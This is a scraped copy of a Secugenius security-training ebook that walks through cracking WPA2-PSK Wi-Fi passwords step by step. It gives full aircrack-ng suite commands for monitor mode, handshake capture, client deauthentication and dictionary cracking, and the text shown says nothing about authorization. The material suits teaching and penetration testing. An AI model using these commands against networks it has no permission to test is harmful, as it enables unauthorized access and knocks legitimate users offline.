7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 1/9
7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 2/9
SECUGENIUS SECURITY SOLUTIONS
--------------------------------------------------------------------------------------
(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)
Company Profile:
Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student
Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS
are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius
Security Solutions are providing training in Information Security and various professional courses.
Secugenius Security Solutions is an organization which believes in inventing and implementing newideas to influence the technological minds of the youngsters
Looking at the number of Cyber Crimes since last many years, We at Secugenius Security
Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank
Employees, Police officials.
Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the
benefit of the students & making them aware of the latest trends in technological era of the
Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the
nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime
Investigation & Forensic Sciences
Secugenius provides various security solutions to its clients by securing their websites from cyber
attacks. We provide training to college students, graduates and professionals in various fields.
Education is delivered to students through two modes i.e. Regular mode and Distance mode which
are available as short term and long term courses.
In the workshops conducted by Secugenius, participants can claim to be trained by the highly
experienced & skilled corporate trainers from different parts of the nation. We believe in making
the base of students to be as strong as possible. All the modules have been designed in order to
provide students with specialized knowledge by specialized trainers.
This library was furnished, managed and funded by the Founders and Directors of Secugenius
Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of
the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security
Solutions.
This Online Digital Library has been initiated as a free resource & permanent
resource on specialization basis for every student of Team Secugenius.
7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 3/9
WPA2-PSK Wi-Fi Cracking with Dictionary Method
Product ID No: SG/ODL/13037
Founder & Director: Harpreet Khattar & Kshitij Adhlakha
Resource Person: Chetan Soni
Secugenius Security Solutions
SCO-13A, Model Town Extn, Near Krishna Mandir,
Ludhiana-141002, Punjab – India
[email protected], [email protected]
www.secugenius.com , www.seculabs.in
7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 4/9
Basic Steps:
Put interface in monitor mode.
Find wireless network (protected with WPA2 and a Pre Shared Key)
Capture all packets. Wait until you see a client and deauthenticate the client, so the handshake can becaptured.
Crack the key using a dictionary file.
Step 1 –
Type “iwconfig” to check the wireless interface.
7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 5/9
Step 2 –
Now Start the wireless interface in monitor mode by typing this command,
root@bt:~# airmon-ng start wlan0
Monitor mode is the mode whereby your card can listen to every packet in the air.Normally your card will only “hear” packets addressed to you.
You can also use this command,
root@bt:~# airmon-ng start wlan0 <Channel No>
root@bt:~# airmon-ng start wlan0 11
7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 6/9
Step 3 –
Now we can use interface mon0
Let’s find a wireless network that uses WPA2/PSK by typing this command,
root@bt:~# airodump-ng mon0
Stop airodump-ng by pressing [CTRL+C] and run it again.
7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 7/9
Step 4 –
Now Next step is to collect authentication handshake,
Now run airodump-ng to capture the 4-way authentication handshake for the AP we are
interested in,
root@bt:~# airodump-ng –c 11 --bssid 00:22:93:8F:D9:F5 mon0 –w chetancracking
Where,
-c 11 stands for channel for the wireless network.--bssid 00:22:93:8F:D9:F5 is the Access point MAC address.-w chetancracking is the file name prefix for the file which will contain the IVs.mon0 is the interface name.
Do NOT use the ” --ivs” option. You must capture the full packets.
7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 8/9
Step 5 –
Now Next step is to deauthenticate the wireless client by typing this command,
root@bt:~# aireplay-ng -0 1 –a 00:22:93:8F:D9:F5 –c 78:E4:00:AE:EC:06 mon0
Where:
-0 means deauthentication1 is the number of deauths to send (you can send multiple if you wish)
-a 00:22:93:8F:D9:F5 is the MAC address of the access point-c 78:E4:00:AE:EC:06 is the MAC address of the client you are deauthingmon0 is the interface name
This step is optional. If you are patient, you can wait until airodump-ng captures a
handshake when one or more clients connect to the AP.
You only perform this step if you opted to actively speed up the process. The otherconstraint is that there must be a wireless client currently associated with the AP.
If there is no wireless client currently associated with the AP, then you have to be patientand wait for one to connect to the AP so that a handshake can be captured.
This step sends a message to the wireless client saying that that it is no longer associatedwith the AP.
The wireless client will then hopefully reauthenticate with the AP. The reauthentication is
what generates the 4-way authentication handshake we are interested in collecting.
7/29/2019 Seculabs eBook - WPA2-PSK Cracking With Dictionary
http://slidepdf.com/reader/full/seculabs-ebook-wpa2-psk-cracking-with-dictionary 9/9
Step 6 –
Now final step is to run aircrack-ng to crack the pre-shared key by typing this command,
root@bt:~# aircrack-ng chetancracking-01.cap –w /pentest/passwords/wordlists/darkc0de.lst
Where,
-w password.lst is the name of the dictionary file.(Remember to specify the full path if the file is not located in the same directory.)
*.cap is name of group of files containing the captured packets.(Notice in this case that we used the wildcard * to include multiple files.)
Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Dependingon the speed of your CPU and the size of the dictionary, this could take a long time, even
days.